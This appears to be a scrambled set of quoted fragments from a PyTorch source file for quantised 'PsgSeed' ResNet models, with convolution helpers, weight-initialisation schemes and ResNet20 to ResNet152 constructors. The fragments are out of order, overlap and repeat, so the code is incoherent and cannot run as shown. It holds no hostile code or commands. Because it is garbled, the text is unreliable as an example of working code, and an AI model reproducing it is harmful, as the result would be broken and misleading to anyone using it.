self.in_planes == 16:", "scale = gain / math.sqrt(2.0 * fan) with torch.no_grad(): new_weight", "out = out.view(out.size(0), -1) out = self.linear(out) return out def", "def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD", "num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear =", "init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1 or in_planes", "return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True,", "predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD", "writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False,", "sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def", "predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad", "super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1", "models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers # Fixed NUM_BITS", "init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out", "self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes", "mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)", "in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return", "nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for m", "isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for", "= self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None self.linear =", "from numpy.lib.arraysetops import isin import torch import torch.nn as nn", "= nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes,", "[3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net = ResNet18() y =", "std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method}", "if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain =", "return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT,", "bop_params = [] for m in self.modules(): if isinstance(m, nn.Conv2d):", "m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters())", "self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False,", "out = self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True,", "Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME>", "class Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes, planes, stride=1):", "return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard',", "= sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10,", "= nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1 = nn.Conv2d(3,", "out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out) return out", "self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 =", "False SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True,", "= True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1", "in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1", "def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out", "msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold", "+= list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, num_blocks, stride):", "reset_conv_parameters(self, init_method=\"standard\") -> None: for m in self.modules(): if isinstance(m,", "ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__()", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2],", "new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method", "class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet,", "SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34(", "self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False,", "std = math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data", "Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck,", "= F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out +=", "writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution", "for m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params +=", "conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut", "kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False,", "nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad():", "nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight,", "self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights", "= 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD =", "with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes,", "self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 =", "predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride", "SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def", "self.shortcut = nn.Sequential() if stride != 1 or in_planes !=", "-> None: if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "\"1x1 convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward", "block.expansion return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out", "= None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset", "\"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\",", "(nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block,", "def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT =", "= 4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY =", "= nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1 or", "nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride != 1 or in_planes", "return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net = ResNet18()", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes,", "in_planes != self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1,", "nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False,", "Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning for", "size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 =", "sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net =", "from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers # Fixed", "SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50(", "torch.nn as nn import torch.nn.functional as F import math import", "in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>,", "= self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3],", "def get_bop_params(self): bop_params = [] for m in self.modules(): if", "def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\":", "not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for", "== \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an", "= self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1],", "= [] for stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes", "num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 =", "numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import", "def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 =", "sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN", "stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2", "kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward,", "= nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def", "* std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise", "padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS,", "self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 =", "planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 =", "sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def", "PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD", "#self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 =", "= sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net", "module.weight.data = torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight,", "= np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method ==", "True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8", "biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,", "nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)", "MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD", "std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign()", "num_classes=num_classes, init_method=init_method) def test(): net = ResNet18() y = net(torch.randn(1,3,32,32))", "in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 =", "nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2", "self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x):", "<NAME> Deep Residual Learning for Image Recognition. arXiv:1512.03385 ''' from", "False WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD", "nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False,", "= conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes)", "bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1", "num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 =", "is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None:", "None: for m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method)", "layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers)", "__init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes =", "stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward =", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "= self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1],", "num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY,", "sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"):", "reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan", "[3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1,", "= F.relu(out) return out class ResNet(nn.Module): def __init__(self, block, num_blocks,", "sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard',", "bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2", "global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD =", "+= self.shortcut(x) out = F.relu(out) return out class ResNet(nn.Module): def", "= self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear", "num_blocks[2], stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method)", "conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no", "= nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes ==", "option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for m in self.modules():", "module.weight.data = module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight,", "self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 =", "num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers = []", "init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion", "writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride !=", "out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed,", "elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in,", "module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else:", "= out.view(out.size(0), -1) out = self.linear(out) return out def PsgSeedResNet20(", "THRESHOLD = 0.0 SPARSIFY = False SIGN = True def", "self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 =", "input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64:", "convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return", "\"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)", "init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10,", "conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self,", "self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes,", "predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1,", "1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 =", "= nn.Sequential() if stride != 1 or in_planes != self.expansion*planes:", "if self.in_planes == 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3,", "self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for m in", "super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1,", "64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3", "-1) out = self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard',", "self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut =", "MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS", "class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes, stride=1):", "return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes,", "4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1", "SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test():", "masked_layers import layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT =", "PredictiveSeedConv2d from masked_layers import layers # Fixed NUM_BITS = 32", "planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False,", "writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride !=", "nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 * fan) with torch.no_grad():", "F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out += self.shortcut(x)", "# out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)", "+= self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module): expansion", "writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1", "self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\")", "sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def", "predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix)", "\"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with", "False PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER = 0", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)", "!= 1 or in_planes != self.expansion*planes: self.shortcut = nn.Sequential( #", "bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3", "module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan =", "sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def", "init_method) def get_bop_params(self): bop_params = [] for m in self.modules():", "sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self,", "= None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD = True", "MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD", "= msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY =", "expansion = 4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__()", "= nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1,", "PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self):", "std elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain", "raise ValueError(f\"{init_method} is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\")", "F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out)", "sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY,", "True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution", "stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv", "* std elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if", "= nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out)) with", "= gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() *", "with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d(", "PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER = 0 #", "in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion", "def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3", "+= list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = [] for", "= 32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD =", "in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params", "self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None self.linear", "THRESHOLD = threshold SPARSIFY = sparsify SIGN = sign return", "= F.relu(out) return out class Bottleneck(nn.Module): expansion = 4 def", "= [] for m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):", "self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),", "ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "= module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method ==", "predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and", "forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out =", "list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, num_blocks, stride): strides", "stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block,", "= F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out =", "writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes,", "NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD", "= PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride,", "nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 =", "# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False,", "or in_planes != self.expansion*planes: self.shortcut = nn.Sequential( # 